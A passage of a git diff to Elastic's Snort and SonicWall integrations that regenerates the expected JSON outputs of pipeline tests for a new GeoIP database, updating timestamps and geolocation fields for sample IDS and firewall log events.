"2021-12-09T13:44:48.094047600Z", + "ingested": "2021-12-14T14:54:33.351283476Z", "original": "09/04-21:50:40.017935 ,1,1000005,0,\"UDP Connection\",UDP,10.100.10.1,53,10.100.10.190,55475,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0xC1,,,,,,64,0,56094,179,183296,,,,", "category": [ "network" @@ -262,7 +262,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:48.094054900Z", + "ingested": "2021-12-14T14:54:33.351283859Z", "original": "09/04-21:50:39.947383 ,1,1000005,0,\"UDP Connection\",UDP,10.100.10.1,53,10.100.10.190,55333,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0xB1,,,,,,64,0,26112,163,166912,,,,", "category": [ "network" @@ -333,7 +333,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:48.094060Z", + "ingested": "2021-12-14T14:54:33.351284253Z", "original": "09/04-21:50:40.666095 ,1,1000005,0,\"UDP Connection\",UDP,10.100.10.75,55776,10.100.10.255,32414,00:0C:29:B8:43:CE,FF:FF:FF:FF:FF:FF,0x3F,,,,,,64,0,37712,49,50176,,,,", "category": [ "network" @@ -365,19 +365,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -419,7 +414,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:48.094065100Z", + "ingested": "2021-12-14T14:54:33.351284624Z", "original": "09/04-21:49:55.900215 ,1,1000004,0,\"Pinging...\",ICMP,10.100.10.190,,175.16.199.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37607,84,86016,8,0,83,1", "category": [ "network" @@ -467,19 +462,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -511,7 +501,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:48.094070200Z", + "ingested": "2021-12-14T14:54:33.351285021Z", "original": "09/04-21:49:55.911592 ,1,1000004,0,\"Pinging...\",ICMP,175.16.199.1,,10.100.10.190,,00:25:90:3A:05:13,00:50:56:9D:A5:BE,0x62,,,,,,54,0,23522,84,86016,0,0,83,1", "category": [ "network" @@ -549,19 +539,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -603,7 +588,7 @@ ] }, "event": { - "ingested": "2021-12-09T13:44:48.094076700Z", + "ingested": "2021-12-14T14:54:33.351285402Z", "original": "09/04-21:49:56.900997 ,1,1000004,0,\"Pinging...\",ICMP,10.100.10.190,,175.16.199.1,,00:50:56:9D:A5:BE,00:25:90:3A:05:13,0x62,,,,,,64,0,37636,84,86016,8,0,83,2", "category": [ "network" diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log-expected.json index 993e55a0bef..d53551b9e07 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-fast.log-expected.json @@ -43,7 +43,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:49.150056700Z", + "ingested": "2021-12-14T14:54:34.293923694Z", "original": "05/30-19:09:10.917356 [**] [1:527:8] BAD-TRAFFIC same SRC/DST [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 0.0.0.0:68 -\u003e 255.255.255.255:67", "timezone": "America/Chicago", "created": "2021-05-30T19:09:10.917-05:00", @@ -60,19 +60,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -116,7 +111,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:49.150067100Z", + "ingested": "2021-12-14T14:54:34.293925998Z", "original": "05/30-19:09:28.472094 [**] [1:2012811:2] ET DNS DNS Query to a .tk domain - Likely Hostile [**] [Classification: Potentially Bad Traffic] [Priority: 2] {UDP} 192.168.88.10:1029 -\u003e 175.16.199.1:53", "timezone": "America/Chicago", "created": "2021-05-30T19:09:28.472-05:00", @@ -133,19 +128,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -159,19 +149,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -202,7 +187,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:44:49.150073400Z", + "ingested": "2021-12-14T14:54:34.293926449Z", "original": "05/30-19:09:10.917356 [**] [1:477:3] ICMP Packet [**] [Priority: 0] {ICMP} 175.16.199.1 -\u003e 175.16.199.1", "timezone": "America/Chicago", "created": "2021-05-30T19:09:10.917-05:00", @@ -219,19 +204,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -275,7 +255,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:44:49.150079300Z", + "ingested": "2021-12-14T14:54:34.293926849Z", "original": "12/30-14:09:21.116402 [**] [1:1917:6] SCAN UPnP service discover attempt [**] [Classification: Detection of a Network Scan] [Priority: 3] {TCP} 192.168.15.10:1035 -\u003e 175.16.199.1:1900", "timezone": "America/Chicago", "created": "2021-12-30T14:09:21.116-06:00", @@ -303,19 +283,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -348,7 +323,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:44:49.150085500Z", + "ingested": "2021-12-14T14:54:34.293927247Z", "original": "01/21-02:23:42.327730 [**] [1:2014520:2] ET INFO EXE - Served Attached HTTP [**] [Classification: Misc activity] [Priority: 3] {TCP} 175.16.199.1:80 -\u003e 192.168.115.10:1051", "timezone": "America/Chicago", "created": "2021-01-21T02:23:42.327-06:00", @@ -375,19 +350,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -419,7 +389,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:44:49.150092Z", + "ingested": "2021-12-14T14:54:34.293927632Z", "original": "01/21-02:23:42.208605 [**] [1:408:5] ICMP Echo Reply [**] [Classification: Misc activity] [Priority: 3] {ICMP} 175.16.199.1 -\u003e 192.168.115.10", "timezone": "America/Chicago", "created": "2021-01-21T02:23:42.208-06:00", @@ -447,19 +417,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -492,7 +457,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:44:49.150098100Z", + "ingested": "2021-12-14T14:54:34.293928007Z", "original": "09/04-21:55:02.041364 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 175.16.199.1:53 -\u003e 10.100.10.190:54757", "timezone": "America/Chicago", "created": "2021-09-04T21:55:02.041-05:00", @@ -520,19 +485,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -565,7 +525,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:44:49.150103900Z", + "ingested": "2021-12-14T14:54:34.293928419Z", "original": "09/04-21:55:02.118427 [**] [1:1000005:0] UDP Connection [**] [Classification: A Network Trojan was Detected] [Priority: 1] {UDP} 175.16.199.1:53 -\u003e 10.100.10.190:36312", "timezone": "America/Chicago", "created": "2021-09-04T21:55:02.118-05:00", @@ -582,19 +542,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -636,7 +591,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:49.150110Z", + "ingested": "2021-12-14T14:54:34.293928798Z", "original": "09/04-21:54:43.216486 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 10.100.10.190 -\u003e 175.16.199.1", "timezone": "America/Chicago", "created": "2021-09-04T21:54:43.216-05:00", @@ -663,19 +618,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -707,7 +657,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:49.150116Z", + "ingested": "2021-12-14T14:54:34.293929172Z", "original": "09/04-21:54:43.227117 [**] [1:1000004:0] Pinging... [**] [Classification: Attempted Information Leak] [Priority: 2] {ICMP} 175.16.199.1 -\u003e 10.100.10.190", "timezone": "America/Chicago", "created": "2021-09-04T21:54:43.227-05:00", diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log-expected.json index ee6ae8b00df..72ead5b91ae 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-full.log-expected.json @@ -42,7 +42,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:44:50.388577300Z", + "ingested": "2021-12-14T14:54:35.512406786Z", "original": "[**] [1:1000006:0] TCP connection [**]\n[Priority: 0] \n09/04-21:42:42.860730 10.100.20.59:57263 -\u003e 10.100.10.190:22\nTCP TTL:127 TOS:0x0 ID:53730 IpLen:20 DgmLen:108 DF\n***AP*** Seq: 0x688E00E4 Ack: 0xBC730BB6 Win: 0x80B TcpLen: 20\n", "timezone": "-05:00", "created": "2021-09-04T21:42:42.860-05:00", @@ -107,7 +107,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:44:50.388585300Z", + "ingested": "2021-12-14T14:54:35.512409539Z", "original": "[**] [1:1000006:0] TCP connection [**]\n[Priority: 0] \n09/04-21:42:42.903092 10.100.20.59:57263 -\u003e 10.100.10.190:22\nTCP TTL:127 TOS:0x0 ID:53731 IpLen:20 DgmLen:40 DF\n***A**** Seq: 0x688E0128 Ack: 0xBC730C02 Win: 0x80B TcpLen: 20\n", "timezone": "-05:00", "created": "2021-09-04T21:42:42.903-05:00", @@ -173,7 +173,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:44:50.388590600Z", + "ingested": "2021-12-14T14:54:35.512410045Z", "original": "[**] [1:1000005:0] UDP Connection [**]\n[Classification: A Network Trojan was Detected] [Priority: 1] \n09/04-21:53:15.299702 10.100.10.1:53 -\u003e 10.100.10.190:36635\nUDP TTL:64 TOS:0x0 ID:58363 IpLen:20 DgmLen:83\nLen: 55\n", "timezone": "-05:00", "created": "2021-09-04T21:53:15.299-05:00", @@ -202,19 +202,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -256,7 +251,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:50.388595300Z", + "ingested": "2021-12-14T14:54:35.512410487Z", "original": "[**] [1:1000004:0] Pinging... [**]\n[Classification: Attempted Information Leak] [Priority: 2] \n09/04-21:53:15.299988 10.100.10.190 -\u003e 175.16.199.1\nICMP TTL:64 TOS:0x0 ID:6922 IpLen:20 DgmLen:84 DF\nType:8 Code:0 ID:101 Seq:1 ECHO\n", "timezone": "-05:00", "created": "2021-09-04T21:53:15.299-05:00", @@ -328,7 +323,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:50.388633200Z", + "ingested": "2021-12-14T14:54:35.512410899Z", "original": "[**] [1:1000006:0] TCP connection [**]\n[Classification: Potentially Bad Traffic] [Priority: 2] \n09/04-21:53:15.301504 10.100.20.59:57263 -\u003e 10.100.10.190:22\nTCP TTL:127 TOS:0x0 ID:61472 IpLen:20 DgmLen:40 DF\n***A**** Seq: 0x68940D74 Ack: 0xBC811F16 Win: 0x80E TcpLen: 20\n", "timezone": "-05:00", "created": "2021-09-04T21:53:15.301-05:00", @@ -365,19 +360,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -409,7 +399,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:50.388660400Z", + "ingested": "2021-12-14T14:54:35.512411318Z", "original": "[**] [1:1000004:0] Pinging... [**]\n[Classification: Attempted Information Leak] [Priority: 2] \n09/04-21:53:15.309468 175.16.199.1 -\u003e 10.100.10.190\nICMP TTL:114 TOS:0x0 ID:0 IpLen:20 DgmLen:84\nType:0 Code:0 ID:101 Seq:1 ECHO REPLY\n", "timezone": "-05:00", "created": "2021-09-04T21:53:15.309-05:00", @@ -480,7 +470,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:44:50.388681Z", + "ingested": "2021-12-14T14:54:35.512411741Z", "original": "[**] [1:1000005:0] UDP Connection [**]\n[Classification: A Network Trojan was Detected] [Priority: 1] \n09/04-21:53:15.358155 10.100.10.1:53 -\u003e 10.100.10.190:56012\nUDP TTL:64 TOS:0x0 ID:33955 IpLen:20 DgmLen:153\nLen: 125", "timezone": "-05:00", "created": "2021-09-04T21:53:15.358-05:00", diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log-expected.json index a707d940347..e640891cdff 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-pfsense.log-expected.json @@ -4,19 +4,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -32,19 +27,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -76,7 +66,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:51.135040700Z", + "ingested": "2021-12-14T14:54:36.302057808Z", "original": "09/03/21-12:37:16.428952 ,1,2403488,68499,\"ET CINS Active Threat Intelligence Poor Reputation IP TCP group 95\",TCP,175.16.199.1,36847,175.16.199.1,91,54321,Misc Attack,2,alert,Allow", "timezone": "America/Chicago", "created": "2021-01-04T12:37:16.428-06:00", @@ -99,19 +89,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -127,19 +112,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -171,7 +151,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:44:51.135050100Z", + "ingested": "2021-12-14T14:54:36.302060911Z", "original": "09/03/21-12:56:44.310212 ,1,2011716,4,\"ET SCAN Sipvicious User-Agent Detected (friendly-scanner)\",UDP,175.16.199.1,5103,175.16.199.1,5060,54925,Attempted Information Leak,2,alert,Allow", "timezone": "America/Chicago", "created": "2021-01-04T12:56:44.310-06:00", @@ -194,19 +174,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -221,19 +196,14 @@ "source": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -264,7 +234,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:44:51.135058700Z", + "ingested": "2021-12-14T14:54:36.302061490Z", "original": "09/03/21-16:29:03.494387 ,1,477,3,\"ICMP Packet\",ICMP,175.16.199.1,,175.16.199.1,,40546,,0,alert,Allow", "timezone": "America/Chicago", "created": "2021-01-04T16:29:03.494-06:00", diff --git a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log-expected.json b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log-expected.json index ea2b979c40d..f651f9d02b8 100644 --- a/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log-expected.json +++ b/packages/snort/data_stream/log/_dev/test/pipeline/test-log-syslog.log-expected.json @@ -47,7 +47,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:44:51.600089400Z", + "ingested": "2021-12-14T14:54:36.775944022Z", "original": "Sep 5 16:05:26 dev snort: [1:1000017:0] UDP Connection [Classification: Misc activity] [Priority: 3] {UDP} 10.150.10.44:55776 -\u003e 10.25.10.22:32414", "timezone": "America/Chicago", "created": "2021-09-05T16:05:26.000-05:00", @@ -106,7 +106,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:44:51.600098200Z", + "ingested": "2021-12-14T14:54:36.775946472Z", "original": "Sep 5 16:05:26 dev snort: [1:1000016:0] TCP Connection [Priority: 3] {TCP} 10.50.20.59:58720 -\u003e 10.50.10.190:22", "timezone": "America/Chicago", "created": "2021-09-05T16:05:26.000-05:00", @@ -126,19 +126,14 @@ "destination": { "geo": { "continent_name": "Asia", - "region_iso_code": "CN-JL", + "region_iso_code": "CN-22", + "city_name": "Changchun", + "country_iso_code": "CN", "country_name": "China", - "region_name": "Jilin", + "region_name": "Jilin Sheng", "location": { "lon": 125.3228, "lat": 43.88 - }, - "country_iso_code": "CN" - }, - "as": { - "number": 4837, - "organization": { - "name": "CHINA UNICOM China169 Backbone" } }, "address": "175.16.199.1", @@ -181,7 +176,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:44:51.600104Z", + "ingested": "2021-12-14T14:54:36.775946913Z", "original": "Sep 5 16:02:55 dev snort: [1:1000015:0] Pinging... [Classification: Misc activity] [Priority: 3] {ICMP} 10.50.10.88 -\u003e 175.16.199.1", "timezone": "America/Chicago", "created": "2021-09-05T16:02:55.000-05:00", diff --git a/packages/snort/manifest.yml b/packages/snort/manifest.yml index 1206d23f2cc..26c08bebc45 100644 --- a/packages/snort/manifest.yml +++ b/packages/snort/manifest.yml @@ -1,6 +1,6 @@ name: snort title: Snort -version: 0.1.1 +version: 0.1.2 release: experimental description: Collect logs from Snort with Elastic Agent. type: integration diff --git a/packages/sonicwall/changelog.yml b/packages/sonicwall/changelog.yml index 86c6e063c9d..837b4ed2b29 100644 --- a/packages/sonicwall/changelog.yml +++ b/packages/sonicwall/changelog.yml @@ -1,4 +1,9 @@ # newer versions go on top +- version: "0.6.1" + changes: + - description: Regenerate test files using the new GeoIP database + type: bugfix + link: https://github.com/elastic/integrations/pull/2339 - version: "0.6.0" changes: - description: Add 8.0.0 version constraint diff --git a/packages/sonicwall/data_stream/firewall/_dev/test/pipeline/test-general.log-expected.json b/packages/sonicwall/data_stream/firewall/_dev/test/pipeline/test-general.log-expected.json index 414d415a4ea..b517cb3e688 100644 --- a/packages/sonicwall/data_stream/firewall/_dev/test/pipeline/test-general.log-expected.json +++ b/packages/sonicwall/data_stream/firewall/_dev/test/pipeline/test-general.log-expected.json @@ -1,252 +1,252 @@ { "expected": [ { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:06\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23419 src=2.2.2.2:36701:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000", "event": { - "ingested": "2021-06-09T13:23:15.557766200Z" + "ingested": "2021-12-14T14:54:38.285969322Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=1.1.1.1 pri=1 c=32 m=30 msg=\"Administrator login denied due to bad credentials\" n=7 src=2.2.2.2:36701:WAN dst=1.1.1.1:50000:WAN", "event": { - "ingested": "2021-06-09T13:23:15.557789Z" + "ingested": "2021-12-14T14:54:38.285972048Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:36 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23420 src=2.2.2.2:36702:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000", "event": { - "ingested": "2021-06-09T13:23:15.557796600Z" + "ingested": "2021-12-14T14:54:38.285972649Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:07\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567996 src=192.168.4.10:27577:WAN dst=192.168.5.10:53:LAN proto=tcp/dns sent=257 rcvd=242", "event": { - "ingested": "2021-06-09T13:23:15.557822100Z" + "ingested": "2021-12-14T14:54:38.285973201Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:37 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:08\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567997 src=192.168.5.56:4277:LAN dst=192.168.1.100:1026:WAN proto=tcp/1026 sent=3590 rcvd=13042 vpnpolicy=\"name\"", "event": { - "ingested": "2021-06-09T13:23:15.557828800Z" + "ingested": "2021-12-14T14:54:38.285973692Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567999 src=192.168.5.56:4280:LAN dst=192.168.2.81:41850:WAN proto=tcp/41850 sent=386026 rcvd=454118 vpnpolicy=\"name\"", "event": { - "ingested": "2021-06-09T13:23:15.557834600Z" + "ingested": "2021-12-14T14:54:38.285974214Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:39 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=1.1.1.1 pri=6 c=1024 m=537 msg=\"Connection Closed\" n=567999 src=1.1.1.1:500:WAN dst=2.2.2.2:500:WAN proto=udp/500 sent=344 rcvd=152", "event": { - "ingested": "2021-06-09T13:23:15.557840600Z" + "ingested": "2021-12-14T14:54:38.285974713Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:40 192.168.5.1 id=firewall sn=000SERIAL time=\"2007-01-03 14:48:10\" fw=1.1.1.1 pri=6 c=262144 m=98 msg=\"Connection Opened\" n=23421 src=2.2.2.2:36703:WAN dst=1.1.1.1:50000:WAN proto=tcp/50000", "event": { - "ingested": "2021-06-09T13:23:15.557845800Z" + "ingested": "2021-12-14T14:54:38.285975185Z" + }, + "ecs": { + "version": "1.12.0" }, "tags": [ "preserve_original_event" ] }, { - "ecs": { - "version": "1.12.0" - }, "message": "Jan 3 13:45:40 